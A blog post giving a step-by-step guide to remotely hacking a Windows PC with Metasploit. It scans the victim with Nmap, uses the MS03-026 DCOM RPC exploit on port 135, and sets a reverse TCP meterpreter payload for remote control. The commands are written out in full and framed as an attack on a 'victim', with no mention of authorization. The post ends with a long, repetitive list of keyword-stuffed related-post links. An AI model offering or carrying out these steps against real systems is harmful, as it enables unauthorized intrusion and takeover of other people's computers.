Sunday, January 28, 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Related posts


  1. Pentest Tools Framework
  2. Pentest Tools For Ubuntu
  3. Hacking Tools Kit
  4. Hack Tools For Pc
  5. Beginner Hacker Tools
  6. Computer Hacker
  7. Hacker Tools Online
  8. Hack Tools 2019
  9. Hacking App
  10. Pentest Tools Find Subdomains
  11. Game Hacking
  12. Hacker Tools 2019
  13. Pentest Tools Download
  14. Hacking Tools Software
  15. How To Install Pentest Tools In Ubuntu
  16. Hackers Toolbox
  17. Hacking Tools Github
  18. Growth Hacker Tools
  19. Ethical Hacker Tools
  20. Hack And Tools
  21. Hack Tools For Pc
  22. Pentest Tools Android
  23. Growth Hacker Tools
  24. Hacking Tools Free Download
  25. Hacking Tools 2019
  26. Ethical Hacker Tools
  27. Hacker Tools Linux
  28. Install Pentest Tools Ubuntu
  29. Hack Tools Online
  30. Hacker Hardware Tools
  31. Hacking Tools Download
  32. Pentest Tools List
  33. Hacker Tools Free
  34. Hacker Tool Kit
  35. Hack Tools Online
  36. Hack Apps
  37. Hacking App
  38. Hack Tools Pc
  39. Pentest Tools Online
  40. Hacker Tools For Ios
  41. Hack Rom Tools
  42. Computer Hacker
  43. Hacker Techniques Tools And Incident Handling
  44. Pentest Tools For Windows
  45. How To Install Pentest Tools In Ubuntu
  46. Hacking Tools 2020
  47. Pentest Tools Open Source
  48. Pentest Tools Subdomain
  49. Tools Used For Hacking
  50. Hacker Search Tools
  51. Pentest Tools Tcp Port Scanner
  52. Pentest Tools Bluekeep
  53. Pentest Tools Online
  54. Hacking Tools Pc
  55. Hacking Tools For Kali Linux
  56. Hacking Tools Github
  57. Hack And Tools
  58. Hacking Tools Hardware
  59. Hacker Tools For Pc
  60. Hacker Tools For Windows
  61. Hacking Tools Kit
  62. Hack Tool Apk
  63. Pentest Tools Kali Linux
  64. Pentest Box Tools Download
  65. Hacker Techniques Tools And Incident Handling
  66. Hack Tools
  67. Hacking Tools
  68. Hacking Tools Hardware
  69. Hack Tool Apk
  70. Termux Hacking Tools 2019
  71. Hacker Tools For Pc
  72. Ethical Hacker Tools
  73. Hacking Tools Name
  74. Kik Hack Tools
  75. Hack Tools For Games
  76. Hack Apps
  77. Hacking Tools For Games
  78. Pentest Tools Nmap
  79. Pentest Tools Apk
  80. Hacker Tools For Windows
  81. Pentest Tools Port Scanner
  82. Hacking Tools For Beginners
  83. Pentest Tools Github
  84. Pentest Tools Windows
  85. Hacking Tools For Beginners
  86. Hacking Tools Software
  87. Hack Tool Apk No Root
  88. Hacking Tools 2019
  89. Hack Apps
  90. Pentest Tools Online
  91. Hacking Tools 2020
  92. Pentest Tools For Ubuntu
  93. Hacking Tools For Pc
  94. Kik Hack Tools
  95. Hak5 Tools
  96. Hacking Tools Github
  97. Pentest Tools
  98. Underground Hacker Sites
  99. Pentest Tools Apk
  100. Hacking Tools Name
  101. Pentest Tools For Mac
  102. Hak5 Tools
  103. Hack Tools Github
  104. Hacking Tools For Mac
  105. Hacker Tools For Ios
  106. Pentest Tools Find Subdomains
  107. Hacking Tools Mac
  108. Install Pentest Tools Ubuntu
  109. Hacker Tools For Mac
  110. Pentest Tools For Android
  111. Hacker Tool Kit
  112. Hack Tools Pc
  113. Install Pentest Tools Ubuntu
  114. Hack Tools For Mac
  115. Pentest Tools Apk
  116. Hackrf Tools
  117. Hacker Tools Windows
  118. Hackrf Tools
  119. Hack Tools
  120. Pentest Tools For Android
  121. Github Hacking Tools
  122. Pentest Tools Website Vulnerability
  123. Nsa Hack Tools Download
  124. Pentest Automation Tools
  125. Tools Used For Hacking
  126. Hacking Tools Mac
  127. Pentest Tools Tcp Port Scanner
  128. Hack Tools
  129. Pentest Tools Framework

No comments:

Post a Comment